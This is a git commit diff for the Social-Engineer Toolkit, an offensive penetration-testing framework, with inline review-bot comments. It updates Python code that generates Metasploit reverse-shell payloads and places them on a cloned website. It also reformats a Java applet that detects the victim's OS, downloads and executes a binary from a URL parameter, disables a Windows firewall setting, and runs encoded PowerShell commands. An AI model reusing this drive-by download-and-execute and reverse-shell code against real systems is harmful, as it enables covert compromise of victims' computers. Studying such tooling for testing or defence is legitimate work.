Merge branch 'master' of github.com:trustedsec/social-engineer-toolkit

This commit is contained in:
trustedsec 2013-08-11 11:31:23 -04:00
commit 94474138fb
5 changed files with 124 additions and 110 deletions


@ -1,3 +1,16 @@
~~~~~~~~~~~~~~~~
version 5.3.1
~~~~~~~~~~~~~~~~
* Fixed an issue that was causing the Metasploit payloads for OSX/Linux to not generate properly
* Added new configuration options in set_config to allow selectable Linux/OSX payloads
* Added new configuration option to allow you to add a custom payload for OSX/Linux
* Changed PowerShell injection from using port 8080, this is still configurable
* Fixed an issue when meterpreter payloads were specified, encoding would default to 0 instead of 4
* Fixed spacing issues on set LHOST commands within Powershell payload prep
* Cleaned up the Java Applet code and added appropriate spaces
* Fixed an issue that would cause OSX payloads to not properly work
~~~~~~~~~~~~~~~~
version 5.3
~~~~~~~~~~~~~~~~


@ -297,8 +297,9 @@ try:
encoder = "true"
# Handle special cases
if encode=='' or encode == ' ': encode = '16'
if encode == '16': encount=0
if encode=='' or encode == ' ': encode = '1'
if encode == '1':
encount="4"
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
@ -658,15 +659,24 @@ try:
# deploy nix and linux binaries
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
port2=check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/mac.bin;chmod 755 %s/mac.bin" % (path,choice2,port1,setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s LPORT=%s X > %s/mac.bin;chmod 755 %s/mac.bin" % (path,osxpayload,choice2,port1,setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/nix.bin" % (path,choice2,port2,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s LPORT=%s X > %s/nix.bin" % (path,linuxpayload,choice2,port2,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload))
osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck))
shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck))
# try block here
try:
# if they want a listener, start here
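Review bot: The new `subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s LPORT=%s X > %s/mac.bin;chmod 755 %s/mac.bin" % (path,osxpayload,...), ..., shell=True).wait()` lines (and the nix.bin twin) discard the exit status, so when the ruby call fails the shell redirect still leaves an empty mac.bin/nix.bin that the shutil.copyfile calls at the end of the hunk publish into web_clone without complaint; keep the return value and report it, e.g. `if proc.wait() != 0: print_error("msfpayload failed for %s" % osxpayload)` (print_error is the helper seen in the next file of this commit). Because the payload name is now read from set_config and the whole line runs under `shell=True`, any shell metacharacter in OSX_PAYLOAD_DELIVERY or LINUX_PAYLOAD_DELIVERY is executed as part of the command; passing an argument list without `shell=True` and writing the output file from Python would make the config value inert. stdout and stderr are also piped but never read before `.wait()`, which can block if msfpayload emits more than a pipe buffer of output. The enclosing try block starts before this hunk.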


@ -229,7 +229,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '5.3'
define_version = '5.3.1'
return define_version
class create_menu:
@ -753,7 +753,7 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """NextGen Unicorn""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@Dave_ReL1K""" + bcolors.BLUE+""" [---]


@ -112,7 +112,7 @@ if multi_injection == "on":
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\n set LHOST %s\nset EnableStageEncoding true\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, ports))
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding true\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, ports))
filewrite.close()
# if its turned to off


@ -6,12 +6,13 @@ import java.util.*;
import sun.misc.BASE64Decoder;
import java.net.URL;
/**
* Original Author: Thomas Werth
* Modifications By: Dave Kennedy, Kevin Mitnick
* This is a universal Applet which determintes Running OS
* Then it fetches based on OS Type download param (WIN,MAC,NIX)
**/
/**************************************************************
*
* Java Applet for the Social-Engineer Toolkit
* Original work from Thomas Werth and customized
* by Dave Kennedy (ReL1K).
*
**************************************************************/
public class Java extends Applet {
@ -21,14 +22,14 @@ public class Java extends Applet {
return initialized;
}
public void init() {
public void init()
{
Process f;
try {
// generate a random string
Random r = new Random();
String token = Long.toString(Math.abs(r.nextLong()), 36);
// generate a random string
Random r = new Random();
String token = Long.toString(Math.abs(r.nextLong()), 36);
String pfad = System.getProperty("java.io.tmpdir") + File.separator;
String writedir = System.getProperty("java.io.tmpdir") + File.separator;
// grab operating system
@ -40,54 +41,51 @@ public class Java extends Applet {
String thirdParm = "";
String fourthParm = "";
String fifthParm = "";
String sixthParm = "";
String seventhParm = "";
String eightParm = "";
short osType = -1 ;//0=win,1=mac,2=nix
String sixthParm = "";
String seventhParm = "";
String eightParm = "";
short osType = -1 ; // 0=WIN, 1=MAC, 2=NIX
if (os.indexOf( "win" ) >= 0) // We are running Windows then
{
// 1 = WINDOWSPLZ
// 2 = ILIKESTUFF
// 3 = OSX
// 4 = LINUX
// 5 = X64
// 6 = X86
// 7 = HUGSNOTDRUGS
// 8 = LAUNCH
// 9 = nextPage
// 10 = B64EncodeTimes
// 1 = WINDOWSPLZ
// 2 = ILIKESTUFF
// 3 = OSX
// 4 = LINUX
// 5 = X64
// 6 = X86
// 7 = HUGSNOTDRUGS
// 8 = LAUNCH
// 9 = nextPage
// 10 = B64EncodeTimes
downParm = getParameter( "1" );
nextParm = getParameter( "2" );
thirdParm = getParameter( "5" );
fourthParm = getParameter( "6" );
fifthParm = getParameter( "7" );
sixthParm = getParameter( "8" );
seventhParm = getParameter( "9" );
eightParm = getParameter( "10" );
sixthParm = getParameter( "8" );
seventhParm = getParameter( "9" );
eightParm = getParameter( "10" );
osType = 0;
pfad += token + ".exe";
}
else if (os.indexOf( "mac" ) >= 0) //MAC
else if (os.indexOf("mac") >= 0) //MAC
{
downParm = getParameter( "3" );
osType = 1;
// look for special folders to define snow leopard, etc.
if (pfad.startsWith("/var/folders/")) pfad = "/tmp/";
// look for special folders to define snow leopard, etc.
if (pfad.startsWith("/var/folders/")) pfad = "/tmp/"; // OSX SNOW LEOPARD AND ABOVE
pfad += token + ".bin";
}
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0) // UNIX
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0) // UNIX
{
downParm = getParameter( "4" );
osType = 2;
pfad += token + ".bin";
}
if ( downParm.length() > 0 && pfad.length() > 0 )
{
// attempt to disable statefulftp if running as an administrator
f = Runtime.getRuntime().exec("netsh advfirewall set global StatefulFTP disable");
if ( downParm.length() > 0 && pfad.length() > 0 )
{
// URL parameter
URL url = new URL(downParm);
// Get an input stream for reading
@ -95,10 +93,10 @@ public class Java extends Applet {
// Create a buffered input stream for efficency
BufferedInputStream bufIn = new BufferedInputStream(in);
File outputFile = new File(pfad);
OutputStream out =
new BufferedOutputStream(new FileOutputStream(outputFile));
OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile));
byte[] buffer = new byte[2048];
for (;;) {
for (;;)
{
int nBytes = bufIn.read(buffer);
if (nBytes <= 0) break;
out.write(buffer, 0, nBytes);
@ -106,28 +104,23 @@ public class Java extends Applet {
out.flush();
out.close();
in.close();
}
}
// has it executed yet? then target nextPage to victim
String page = getParameter( "9" );
if ( page != null && page.length() > 0 )
if ( page != null && page.length() > 0 )
{
URL urlPage = new URL(page);
getAppletContext().showDocument(urlPage);
}
// Here is where we define OS type, i.e. windows, linux, osx, etc.
// Here is where we define OS type, i.e. windows, linux, osx, etc.
if ( osType < 1 ) // If we're running Windows
{
// Disabled the check, even if it doesn't exist, it will still execute, removes
// inability to determine path variables
// attempt to disable statefulftp if running as an administrator
f = Runtime.getRuntime().exec("netsh advfirewall set global StatefulFTP disable");
// powershell x86 or 64 bit
//File folderExisting = new File("C:\\Windows\\System32\\WindowsPowershell\\v1.0");
// if (folderExisting.exists())
// {
if (thirdParm.length() > 3)
{
// this detection is for the new powershell vector, it will run a special command if the flag is turned on in SET
@ -142,33 +135,31 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
}
}
}
else if (arch.contains("i"))
{
// this will be 32 bit
if (thirdParm.length() > 3)
{
// iterate through Parm for our injection
String strMain = thirdParm;
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
}
}
// }
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
}
}
}
else if (arch.contains("i"))
{
// this will be 32 bit
if (thirdParm.length() > 3)
{
// iterate through Parm for our injection
String strMain = thirdParm;
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
}
}
}
}
// if we aren't using the shellcodeexec attack
if (nextParm.length() < 3)
{
// if we turned on binary dropping
if (sixthParm.length() > 2)
{
// if we turned on binary dropping
if (sixthParm.length() > 2)
{
// if we are using the SET interactive shell
if (fifthParm.length() > 2)
@ -196,8 +187,8 @@ public class Java extends Applet {
if (sixthParm.length() > 2)
{
// all parameters are base64 encoded, this will decode for us and pass the decoded strings
BASE64Decoder decoder = new BASE64Decoder();
byte[] decoded = decoder.decodeBuffer(nextParm);
BASE64Decoder decoder = new BASE64Decoder();
byte[] decoded = decoder.decodeBuffer(nextParm);
// decode again
String decoded_string = new String(decoded);
String decoded_string_2 = new String(decoder.decodeBuffer(decoded_string));
@ -215,10 +206,10 @@ public class Java extends Applet {
String decoded_string_8 = new String(decoder.decodeBuffer(decoded_string_7));
// again
String decoded_string_9 = new String(decoder.decodeBuffer(decoded_string_8));
// again
String decoded_string_10 = new String(decoder.decodeBuffer(decoded_string_9));
// last one
String decoded_string_11 = new String(decoder.decodeBuffer(decoded_string_10));
// again
String decoded_string_10 = new String(decoder.decodeBuffer(decoded_string_9));
// last one
String decoded_string_11 = new String(decoder.decodeBuffer(decoded_string_10));
PrintStream out = null;
String randomfile = Long.toString(Math.abs(r.nextLong()), 36);
@ -230,37 +221,37 @@ public class Java extends Applet {
if (out != null) out.close();
}
// this is if we are using multipyinjector
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + writedir + randomfile + " " + eightParm);
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + writedir + randomfile + " " + eightParm);
// this runs the single instance of shellcodeexec, pyinjector, or a binary
f = Runtime.getRuntime().exec("cmd.exe /c \"" + pfad + " " + decoded_string_11 + "\"");
// f.waitFor();
}
}
// delete old file
// (new File(pfad)).delete();
}
else // if not windows then use linux/osx/etc.
{
// change permisisons to execute
Process process1 = Runtime.getRuntime().exec("/bin/chmod 755 " + pfad);
process1.waitFor();
//and execute
f = Runtime.getRuntime().exec(pfad);
// wait for termination
f.waitFor();
// delete old file
(new File(pfad)).delete();
else // if not windows then use linux/osx/etc.
{
// change permisisons to execute
Process process1 = Runtime.getRuntime().exec("/bin/chmod 755 " + pfad);
process1.waitFor();
//and execute
f = Runtime.getRuntime().exec(pfad);
// wait for termination
f.waitFor();
// delete old file
(
new File(pfad)).delete();
}
initialized = this;
} catch(IOException e) {
}
catch(IOException e) {
e.printStackTrace();
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
/* ended here and commented out below for bypass */
catch (Exception exception)
{
exception.printStackTrace();
}
}
}
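Review bot: The cleanup leaves init() with mixed brace styles in one method: the reformatted signature puts the brace on its own line (`public void init()` / `{`), the `try {` directly beneath keeps it on the same line, and the closing `}` / `catch(IOException e) {` near the end of the last hunk splits that pair again; the `if (...)` / `{` form used throughout the body suggests Allman, so apply it to try/catch too. In the same hunk `(` and `new File(pfad)).delete();` are printed on two lines; if that is the source text rather than a rendering artifact it should be rejoined to `(new File(pfad)).delete();`. At the top of the section a second authorship header is added next to the original one; if both survive in the new file, one should be dropped so the class has a single Javadoc header. init() spans every hunk of this section, so only parts of its body are visible here.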